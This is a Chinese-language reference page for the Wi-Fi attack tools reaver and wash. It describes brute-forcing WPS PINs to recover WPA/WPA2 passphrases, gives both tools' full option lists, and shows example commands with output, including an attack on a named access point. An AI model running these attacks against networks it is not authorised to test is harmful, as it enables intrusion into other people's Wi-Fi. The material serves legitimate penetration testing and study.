reaver 介绍

reaver实现对WiFi保护设置(WPS)注册商的PIN暴力攻击,以恢复WPA/WPA2密码短语,如http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf描述。

reaver已被设计为针对WPS粗鲁的和实用的攻击,并且已经测试对多种接入点和WPS的实现。

平均而言,reaver会恢复目标AP的纯文本WPA/ WPA2密钥在4-10小时,这取决于接入点。在实践中,一般会一半的时间来猜测正确的WPS PIN和恢复密码

资料来源:https://code.google.com/p/reaver-wps/
reaver 首页
reaver 源代码版本库

包含在reaver包里的工具

reaver - WiFi保护设置攻击工具

:~# reaver -h

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <>

Required Arguments:
    -i, --interface=<wlan>          Name of the monitor-mode interface to use
    -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
    -m, --mac=<mac>                 MAC of the host system
    -e, --essid=<ssid>              ESSID of the target AP
    -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
    -o, --out-file=<file>           Send output to a log file [stdout]
    -s, --session=<file>            Restore a previous session file
    -C, --exec=<command>            Execute the supplied command upon successful pin recovery
    -D, --daemonize                 Daemonize reaver
    -a, --auto                      Auto detect the best advanced options for the target AP
    -f, --fixed                     Disable channel hopping
    -5, --5ghz                      Use 5GHz 802.11 channels
    -v, --verbose                   Display non-critical warnings (-vv for more)
    -q, --quiet                     Only display critical messages
    -h, --help                      Show help

Advanced Options:
    -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
    -d, --delay=<seconds>           Set the delay between pin attempts [1]
    -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
    -g, --max-attempts=<num>        Quit after num pin attempts
    -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
    -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
    -t, --timeout=<seconds>         Set the receive timeout period [5]
    -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
    -A, --no-associate              Do not associate with the AP (association must be done by another application)
    -N, --no-nacks                  Do not send NACK messages when out of order packets are received
    -S, --dh-small                  Use small DH keys to improve crack speed
    -L, --ignore-locks              Ignore locked state reported by the target AP
    -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
    -n, --nack                      Target AP always sends a NACK [Auto]
    -w, --win7                      Mimic a Windows 7 registrar [False]

Example:
    reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

wash - WiFi保护设置扫描工具

:~# wash -h

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <>

Required Arguments:
    -i, --interface=<iface>              Interface to capture packets on
    -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
    -c, --channel=<num>                  Channel to listen on [auto]
    -o, --out-file=<file>                Write data to file
    -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
    -D, --daemonize                      Daemonize wash
    -C, --ignore-fcs                     Ignore frame checksum errors
    -5, --5ghz                           Use 5GHz 802.11 channels
    -s, --scan                           Use scan mode
    -u, --survey                         Use survey mode [default]
    -h, --help                           Show help

Example:
    wash -i mon0

wash 用法示例

扫描使用的监控模式接口(-i MON0)通道6(C6),而忽略帧校验和错误(-C):

:~# wash -i mon0 -c 6 -C

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <>

BSSID              Channel       RSSI       WPS Version       WPS Locked        ESSID
------------------------------------------------------------------------------------
E0:3F:49:6A:57:78      6          73        1.0               No                ASUS

reaver 用法示例

使用监控模式接口(-i MON0)攻击接入点(-b E0:3F:49:6A:57:78),显示详细输出(-v):

:~# reaver -i mon0 -b E0:3F:49:6A:57:78 -v

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <>

[+] Waiting for beacon from E0:3F:49:6A:57:78
[+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS)
[+] Trying pin 12345670